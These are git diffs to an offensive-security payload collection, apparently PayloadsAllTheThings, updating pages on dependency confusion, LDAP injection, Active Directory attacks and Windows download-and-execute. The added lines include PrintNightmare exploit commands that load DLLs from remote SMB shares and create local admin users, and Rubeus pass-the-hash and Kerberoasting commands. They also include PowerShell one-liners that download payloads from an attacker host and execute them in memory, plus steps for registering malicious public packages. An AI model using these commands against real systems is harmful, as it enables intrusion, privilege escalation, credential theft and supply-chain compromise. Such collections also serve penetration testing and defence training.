Dependency Confusion + LDAP

Dependency Confusion/README.md

@@ -0,0 +1,26 @@
+# Dependency Confusion
+
+> A dependency confusion attack or supply chain substitution attack occurs when a software installer script is tricked into pulling a malicious code file from a public repository instead of the intended file of the same name from an internal repository.
+
+## Summary
+
+* [Tools](#tools)
+* [Exploit](#exploitation)
+* [References](#references)
+
+## Exploit
+
+Look for `npm`, `pip`, `gem` packages, the methodology is the same : you register a public package with the same name of private one used by the company and then you wait for it to be used.
+
+### NPM example
+
+* List all the packages (ie: package.json, composer.json, ...)
+* Find the package missing from https://www.npmjs.com/
+* Register and create a **public** package with the same name
+    * Package example : https://github.com/0xsapra/dependency-confusion-expoit
+
+## References
+
+* [Exploiting Dependency Confusion - 2 Jul 2021 - 0xsapra](https://0xsapra.github.io/website//Exploiting-Dependency-Confusion)
+* [Dependency Confusion: How I Hacked Into Apple, Microsoft and Dozens of Other Companies - Alex Birsan - 9 Feb 2021](https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610)
+* [Ways to Mitigate Risk When Using Private Package Feeds - Microsoft - 29/03/2021](https://azure.microsoft.com/en-gb/resources/3-ways-to-mitigate-risk-using-private-package-feeds/)

GraphQL Injection/README.md

@@ -26,6 +26,7 @@
 * [GraphQL Security Toolkit - GraphQL Security Research Material](https://github.com/doyensec/graph-ql/)
 * [Graphql-path-enum - Lists the different ways of reaching a given type in a GraphQL schema](https://gitlab.com/dee-see/graphql-path-enum)
 * [GraphQL IDE - An extensive IDE for exploring GraphQL API's](https://github.com/andev-software/graphql-ide)
+* [ClairvoyanceX - Obtain GraphQL API schema despite disabled introspection](https://github.com/mchoji/clairvoyancex)
 * [InQL - A Burp Extension for GraphQL Security Testing](https://github.com/doyensec/inql)
 * [Insomnia - Cross-platform HTTP and GraphQL Client](https://insomnia.rest/)
 * [AutoGraphql + introspection](https://graphql-dashboard.herokuapp.com/)

Insecure Deserialization/Java.md

@@ -105,3 +105,4 @@ Payload generators for the following marshallers are included:<br />
 - [Misconfigured JSF ViewStates can lead to severe RCE vulnerabilities - 14 Aug 2017, Peter Stöckli](https://www.alphabot.com/security/blog/2017/java/Misconfigured-JSF-ViewStates-can-lead-to-severe-RCE-vulnerabilities.html)
 - [Jackson CVE-2019-12384: anatomy of a vulnerability class](https://blog.doyensec.com/2019/07/22/jackson-gadgets.html)
 - [On Jackson CVEs: Don’t Panic — Here is what you need to know](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062#da96)
+- [Pre-auth RCE in ForgeRock OpenAM (CVE-2021-35464) - Michael Stepankin / @artsploit - 29 June 2021](https://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464)

LDAP Injection/README.md

@@ -1,6 +1,17 @@
 # LDAP injection
 
-LDAP Injection is an attack used to exploit web based applications that construct LDAP statements based on user input. When an application fails to properly sanitize user input, it's possible to modify LDAP statements using a local proxy.
+> LDAP Injection is an attack used to exploit web based applications that construct LDAP statements based on user input. When an application fails to properly sanitize user input, it's possible to modify LDAP statements using a local proxy.
+
+## Summary
+
+* [Exploitation](#exploitation)
+* [Payloads](#payloads)
+* [Blind Exploitation](#blind-exploitation)
+* [Defaults attributes](#defaults-attributes)
+* [Exploiting userPassword attribute](#exploiting-userpassword-attribute)
+* [Scripts](#scripts)
+  * [Discover valid LDAP fields](#discover-valid-ldap-fields)
+  * [Special blind LDAP injection](#special-blind-ldap-injection)
 
 ## Exploitation
 
@@ -9,7 +20,7 @@ Example 1.
 ```sql
 user  = *)(uid=*))(|(uid=*
 pass  = password
-query = "(&(uid=*)(uid=*)) (|(uid=*)(userPassword={MD5}X03MO1qnZdYdgyfeuILPmQ==))"
+query = (&(uid=*)(uid=*))(|(uid=*)(userPassword={MD5}X03MO1qnZdYdgyfeuILPmQ==))
 ```
 
 Example 2
@@ -124,7 +135,7 @@ print(fields)
 
 Ref. [5][5]
 
-### Special Blind LDAP Injection (without "*")
+### Special blind LDAP injection (without "*")
 
 ```python
 #!/usr/bin/python3
@@ -168,26 +179,13 @@ end
 
 By [noraj](https://github.com/noraj)
 
-## Google Dorks
-
-```
-intitle:"phpLDAPadmin" inurl:cmd.php
-```
-
-Ref. [5][5]
 
 ## References
 
-Injection:
-
 * [OWASP LDAP Injection](https://www.owasp.org/index.php/LDAP_injection)
 * [LDAP Blind Explorer](http://code.google.com/p/ldap-blind-explorer/)
 * [ECW 2018 : Write Up - AdmYSsion (WEB - 50) - 0xUKN](https://0xukn.fr/posts/writeupecw2018admyssion/)
 * [Quals ECW 2018 - Maki](https://maki.bzh/courses/blog/writeups/qualecw2018/)
-* \[5] [LDAP Injection - HackTricks][5]
-
-Normal use:
-
 * [How To Manage and Use LDAP Servers with OpenLDAP Utilities](https://www.digitalocean.com/community/tutorials/how-to-manage-and-use-ldap-servers-with-openldap-utilities)
 * [How To Configure OpenLDAP and Perform Administrative LDAP Tasks](https://www.digitalocean.com/community/tutorials/how-to-configure-openldap-and-perform-administrative-ldap-tasks)
 * SSH key authentication via LDAP
@@ -196,6 +194,4 @@ Normal use:
     - [Setting up OpenLDAP server with OpenSSH-LPK on Ubuntu 14.04](https://blog.shichao.io/2015/04/17/setup_openldap_server_with_openssh_lpk_on_ubuntu.html)
     - [SSH key authentication using LDAP](https://serverfault.com/questions/653792/ssh-key-authentication-using-ldap)
     - [FR] [SSH et LDAP](https://wiki.lereset.org/ateliers:serveurmail:ldap-ssh)
-    - [SSH Public Keys in OpenLDAP](http://pig.made-it.com/ldap-openssh.html)
-
-[5]:https://book.hacktricks.xyz/pentesting-web/ldap-injection
+    - [SSH Public Keys in OpenLDAP](http://pig.made-it.com/ldap-openssh.html)

Methodology and Resources/Active Directory Attack.md

@@ -581,29 +581,42 @@ Exploit steps from the white paper
 #### CVE-2021-1675 PrintNightmare
 
 The DLL will be stored in `C:\Windows\System32\spool\drivers\x64\3\`.
-The exploit will execute the DLL.
+The exploit will execute the DLL either from the local filesystem or a remote share.
+
+Requirements:
+* **Spooler Service** enabled (Mandatory)
+* Server with patches < June 21
+* DC with `Pre Windows 2000 Compatibility` group
+* Server with registry key `HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows NT\Printers\PointAndPrint\NoWarningNoElevationOnInstall` = (DWORD) 1
+* Server with registry key `HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA` = (DWORD) 0
 
-Requirement:
-* **Spooler Service** enabled
-* Windows Server promoted as **Domain Controller**
 
 ```powershell
-# https://github.com/cube0x0/CVE-2021-1675
-pip3 uninstall impacket
-git clone https://github.com/cube0x0/impacket
-cd impacket
-python3 ./setup.py install
+# https://github.com/cube0x0/CVE-2021-1675 - require a modified Impacket: https://github.com/cube0x0/impacket
 python3 ./CVE-2021-1675.py hackit.local/domain_user:[email protected] '\\192.168.1.215\smb\addCube.dll'
 python3 ./CVE-2021-1675.py hackit.local/domain_user:[email protected] 'C:\addCube.dll'
-C:\SharpPrintNightmare.exe C:\addCube.dll
 
-# https://github.com/afwu/PrintNightmare
+# LPE
+SharpPrintNightmare.exe C:\addCube.dll
+
+# RCE using existing context
+SharpPrintNightmare.exe '\\192.168.1.215\smb\addCube.dll' 'C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_addb31f9bff9e936\Amd64\UNIDRV.DLL' '\\192.168.1.20'
+
+# RCE using runas /netonly
+SharpPrintNightmare.exe '\\192.168.1.215\smb\addCube.dll'  'C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_83aa9aebf5dffc96\Amd64\UNIDRV.DLL' '\\192.168.1.10' hackit.local domain_user Pass123
+
+# LPE only (PS1 + DLL) - https://github.com/calebstewart/CVE-2021-1675
+Import-Module .\cve-2021-1675.ps1
+Invoke-Nightmare # add user `adm1n`/`P@ssw0rd` in the local admin group by default
+Invoke-Nightmare -DriverName "Dementor" -NewUser "d3m3nt0r" -NewPassword "AzkabanUnleashed123*" 
+Invoke-Nightmare -DLL "C:\absolute\path\to\your\bindshell.dll"
+
+# Original POC https://github.com/afwu/PrintNightmare
 .\PrintNightmare.exe dc_ip path_to_exp user_name password
 .\PrintNightmare.exe 192.168.5.129 \\192.168.5.197\test\MyExploit.dll user2 test123
 ```
 
-**NOTE**: Do not use Impacket SMB server to host the payload. The exploit works better with an anonymous share on Samba or Windows native SMB.
-
+**NOTE**: The payload can be hosted on Impacket SMB server since [PR #1109](https://github.com/SecureAuthCorp/impacket/pull/1109) .
 
 ### Open Shares
 
@@ -1504,7 +1517,7 @@ $ secretsdump.py -sam sam.save -security security.save -system system.save LOCAL
 
 ### OverPass-the-Hash (pass the key)
 
-Request a TGT with only the NT hash then you can connect to the machine using the TGT.
+In this technique, instead of passing the hash directly, we use the NTLM hash of an account to request a valid Kerberost ticket (TGT).
 
 #### Using impacket
 
@@ -1524,8 +1537,15 @@ klist
 #### Using Rubeus
 
 ```powershell
-C:\Users\triceratops>.\Rubeus.exe asktgt /domain:jurassic.park /user:velociraptor /rc4:2a3de7fe356ee524cc9f3d579f2e0aa7 /ptt
-C:\Users\triceratops>.\PsExec.exe -accepteula \\labwws02.jurassic.park cmd
+# Request a TGT as the target user and pass it into the current session
+# NOTE: Make sure to clear tickets in the current session (with 'klist purge') to ensure you don't have multiple active TGTs
+.\Rubeus.exe asktgt /user:Administrator /rc4:[NTLMHASH] /ptt
+
+# More stealthy variant, but requires the AES256 hash
+.\Rubeus.exe asktgt /user:Administrator /aes256:[AES256HASH] /opsec /ptt
+
+# Pass the ticket to a sacrificial hidden process, allowing you to e.g. steal the token from this process (requires elevation)
+.\Rubeus.exe asktgt /user:Administrator /rc4:[NTLMHASH] /createnetonly:C:\Windows\System32\cmd.exe
 ```
 
 ### Capturing and cracking NTLMv2 hashes
@@ -1774,8 +1794,9 @@ ADACLScan.ps1 -Base "DC=contoso;DC=com" -Filter "(&(AdminCount=1))" -Scope subtr
   # Check if current user has already an SPN setted:
   PowerView2 > Get-DomainUser -Identity <UserName> | select serviceprincipalname
   
-  # Force set the SPN on the account:
+  # Force set the SPN on the account: Targeted Kerberoasting
   PowerView2 > Set-DomainObject <UserName> -Set @{serviceprincipalname='ops/whatever1'}
+  PowerView3 > Set-DomainObject -Identity <UserName> -Set @{serviceprincipalname='any/thing'}
 
   # Grab the ticket
   PowerView2 > $User = Get-DomainUser username 

Methodology and Resources/Windows - Download and Execute.md

@@ -12,6 +12,22 @@ From an HTTP server
 
 ```powershell
 powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://webserver/payload.ps1')|iex"
+
+# Download only
+(New-Object System.Net.WebClient).DownloadFile("http://10.10.10.10/PowerUp.ps1", "C:\Windows\Temp\PowerUp.ps1")
+Invoke-WebRequest "http://10.10.10.10/binary.exe" -OutFile "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\binary.exe"
+
+# Download and run Rubeus, with arguments
+$data = (New-Object System.Net.WebClient).DownloadData('http://10.10.10.10/Rubeus.exe')
+$assem = [System.Reflection.Assembly]::Load($data)
+[Rubeus.Program]::Main("s4u /user:web01$ /rc4:1d77f43d9604e79e5626c6905705801e /impersonateuser:administrator /msdsspn:cifs/file01 /ptt".Split())
+
+# Execute a specific method from an assembly 
+$data = (New-Object System.Net.WebClient).DownloadData('http://10.10.10.10/lib.dll')
+$assem = [System.Reflection.Assembly]::Load($data)
+$class = $assem.GetType("ClassLibrary1.Class1")
+$method = $class.GetMethod("runner")
+$method.Invoke(0, $null)
 ```
 
 From a Webdav server